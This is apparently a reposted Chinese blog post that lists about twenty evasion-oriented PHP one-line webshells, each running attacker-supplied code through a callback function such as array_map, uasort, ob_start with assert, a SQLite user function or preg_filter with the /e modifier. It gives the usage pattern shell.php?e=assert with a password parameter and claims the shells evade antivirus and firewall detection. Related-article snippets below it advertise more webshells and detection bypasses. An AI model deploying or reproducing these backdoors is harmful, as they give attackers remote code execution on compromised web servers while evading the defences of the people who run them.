php 无特征一句话,分享一些无特征PHP一句话

最新推荐文章于 2021-04-16 06:36:58 发布
最新推荐文章于 2021-04-16 06:36:58 发布
阅读量238 收藏
点赞数
文章标签: php 无特征一句话

分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)

原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html

所有一句话使用方法基本都是:

http:// target/shell.php?e=assert 密码pass

01

$e = $_REQUEST[‘e‘];

$arr = array($_POST[‘pass‘],);

array_filter($arr, $e);

02

$e = $_REQUEST[‘e‘];

$arr = array($_POST[‘pass‘],);

array_map($e, $arr);

03

$e = $_REQUEST[‘e‘];

$arr = array(‘test‘, $_REQUEST[‘pass‘]);

uasort($arr, $e);

04

$e = $_REQUEST[‘e‘];

$arr = array(‘test‘ => 1, $_REQUEST[‘pass‘] => 2);

uksort($arr, $e);

05

$arr = new ArrayObject(array(‘test‘, $_REQUEST[‘pass‘]));

$arr->uasort(‘assert‘);

06

$arr = new ArrayObject(array(‘test‘ => 1, $_REQUEST[‘pass‘] => 2));

$arr->uksort(‘assert‘);

07

$e = $_REQUEST[‘e‘];

$arr = array(1);

array_reduce($arr, $e, $_POST[‘pass‘]);

08

$e = $_REQUEST[‘e‘];

$arr = array($_POST[‘pass‘]);

$arr2 = array(1);

array_udiff($arr, $arr2, $e);

09

$e = $_REQUEST[‘e‘];

$arr = array($_POST[‘pass‘] => ‘|.*|e‘,);

array_walk($arr, $e, ‘‘);

10

$e = $_REQUEST[‘e‘];

$arr = array($_POST[‘pass‘] => ‘|.*|e‘,);

array_walk_recursive($arr, $e, ‘‘);

11

mb_ereg_replace(‘.*‘, $_REQUEST[‘pass‘], ‘‘, ‘e‘);

12

echo preg_filter(‘|.*|e‘, $_REQUEST[‘pass‘], ‘‘);

13

ob_start(‘assert‘);

echo $_REQUEST[‘pass‘];

ob_end_flush();

14

$e = $_REQUEST[‘e‘];

register_shutdown_function($e, $_REQUEST[‘pass‘]);

15

$e = $_REQUEST[‘e‘];

declare(ticks=1);

register_tick_function($e, $_REQUEST[‘pass‘]);

16

filter_var($_REQUEST[‘pass‘], FILTER_CALLBACK, array(‘options‘ => ‘assert‘));

17

$e = $_REQUEST[‘e‘];

$db = new PDO(‘sqlite:sqlite.db3‘);

$db->sqliteCreateFunction(‘myfunc‘, $e, 1);

$sth = $db->prepare("SELECT myfunc(:exec)");

$sth->execute(array(‘:exec‘ => $_REQUEST[‘pass‘]));

19

$e = $_REQUEST[‘e‘];

$db = new SQLite3(‘sqlite.db3‘);

$db->createFunction(‘myfunc‘, $e);

$stmt = $db->prepare("SELECT myfunc(?)");

$stmt->bindValue(1, $_REQUEST[‘pass‘], SQLITE3_TEXT);

$stmt->execute();

20

$str = urlencode($_REQUEST[‘pass‘]);

$yaml = <<

greeting: !{$str} "|.+|e"

EOD;

$parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST[‘pass‘]}" => ‘preg_replace‘));

21

preg_replace_callback(‘/.+/i‘, create_function(‘$arr‘, ‘return assert($arr[0]);‘), $_REQUEST[‘pass‘]);

23

mb_ereg_replace_callback(‘.+‘, create_function(‘$arr‘, ‘return assert($arr[0]);‘), $_REQUEST[‘pass‘]);

24

$iterator = new CallbackFilterIterator(new ArrayIterator(array($_REQUEST[‘pass‘],)), create_function(‘$a‘, ‘assert($a);‘));

foreach ($iterator as $item) {echo $item;}

原文:http://www.cnblogs.com/waw/p/6083881.html

weixin_40000131
关注
PHP不包括字母,数字和下划线的webshell
酉酉的博客
10-27 2048
文章目录前言知识铺垫PHP中异或(^)概念PHP取反(~)概念不用数字构造数字用字符串自增,获取字符webshellphp5和7的差异。不用数字和字母的 shell非字母、数字的字符异或出字母非字母、数字的字符取反出字母php 递增/递减运算符实例payload不包括数字,字母和下划线的shell实例payload 前言 膜拜下phithon师傅 一些不包含数字和字母的webshell 另...
特征隐藏php一句话,【转】超级隐蔽的PHP一句话后门
weixin_39830387的博客
04-16 390
我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马:010203404 Not Found0405Not Found06The re...
php特征一句话,分享一些无特征PHP一句话命令
weixin_35289035的博客
03-17 272
类别:Linux / 日期:2020-06-26 / 浏览:394 / 评论:0 分享一些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html所有一句话使...
分享一些无特征PHP一句话
weixin_34179968的博客
11-20 460
分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等) 原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html 所有一句话使用方法基本都是: http:// target/shell.php?e=asse...
php一句话cmdshell新型 (非一句话木马)
10-30
PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...
阿里云的语音识别(一句话识别) SDK PHP代码实现
10-24
在阿里云上的语音识别竟然没有PHP的SDK,而通过他们官方的所谓PHP的openSDK根本也没办法使用,于是,我基于他们的JAVA SDK改写成了PHP SDK,绝对可用!! 里面有些类是挪用了阿里云的官方php OpenSDK中core的代码 ...
php实现批量查询清除一句话后门的代码
10-30
在这个文件中,我们主要了解到如何使用PHP编写一个批量查询并清除网站中的"一句话后门"的脚本。一句话后门是一种常见的网页木马攻击方式,攻击者通过在网页代码中插入一段简短的恶意代码来获取网站的控制权。因其...
阿里云语音识别一句话RESTFUL识别PHP demo
07-26
阿里云语音识别一句话RESTFUL识别PHP demo,由于阿里云语音识别1.0与2.0产品不同,如果提示“Invalid PK is empty or not register”,请前往“https://help.aliyun.com/document_detail/30437.html”开通
特征隐藏php一句话,php一句话cmdshell新型 (非一句话木马)
weixin_42476987的博客
04-16 374
复制代码代码如下:/*一个新型的php一句话cmdshell(非一句话木马)//原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);//局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码;//writebyskyfire*/echo`$_REQUES...
php 过狗一句话木马的编写,过狗一句话编写之代码执行漏洞函数代替eval
weixin_42514432的博客
04-12 915
1.说明tips : 补发一个之前写的过狗一句话,当时有发在博客和t00ls,由于博客重建了,就从t00ls copy过来吧。2.起因及过狗原理今天下午看坛友发了一个求助贴,让帮忙分析一句话木马呢!帖子二楼的大牛分析的很到位,那个一句话木马用了函数回调的方法,传递一个存在代码执行漏洞的函数preg_replace来代替eval执行代码然后我就想着,安全狗查杀一句话的时候,通常检测eval 和 $_...
php 过狗一句话木马的编写
热门推荐
大方子
09-02 1万+
  我们都知道 这个是php一句话  &lt;?php assert($_POST['mima']); ?&gt;可是服务器的安全狗会识别到,我们要经过一些处理, 让安全狗不能认出我们的代码是一句话木马。 好多小白只会用一句话,但是不知道原理,我先大概说一下一句话木马的原理 assert是一个php的函数 assert(这里写代码)  这个函数会执行括号里的代码,(eval 的一句话木...
php后门绕过eval关键字,一些变态的PHP一句话后门收集
weixin_42181929的博客
03-18 1808
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
防止一句话木马,php禁用eval函数
myphpnotes
01-13 9580
eval()针对php安全来说具有很大的杀伤力,一般不用的情况下,为了防止 这样的一句话木马,需要禁止掉的. 网上好多说使用disable_functions禁止掉eval 是错误的 其实eval() 是无法用php.ini中的disable_functions禁止掉的  because eval() is a language construct and not a function
shell 免杀aspx_避开eval关键字,打造免杀一句话木马
weixin_30304773的博客
01-16 1981
这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢?首先我想到的是将eval从字符串类型赋给一个变量。如:$func = 'phpinfo';$func();这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想...
PHP-CTF】无字母无数字webshell
尚未佩妥剑 转眼便江湖
10-31 8155
PHP无字母数字构造Webshell 题目 index.php: &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;40){ //检测字符长度 die("Long."); } if(preg_match("...
PHP一句话
weixin_34054866的博客
12-20 2481
<?php @eval($_POST[pp]);?> 这是一段PHP木马代码,也就是我们所说的后门程序 为什么说这段代码是后门程序? 其实这段代码属于基础类的一句话,功能仅限于验证漏洞了,实际中太容易被查出来了, 这个是PHP最常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算 就这一句话害死人,这样任何人都可以post...
php隐藏真实url_分享一些比较强悍的PHP木马大全源码
weixin_32498321的博客
01-24 1059
由于PHP一句话木马可以说有很多,简单的、中等的、复杂的.......,今天主要是分享一些比较强悍的一些PHP一句话木马大全;一、利用404页面隐藏PHP小马<html><head><title>404 Not Foundtitle>head><body><h1>Not Foundh1><p>The...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值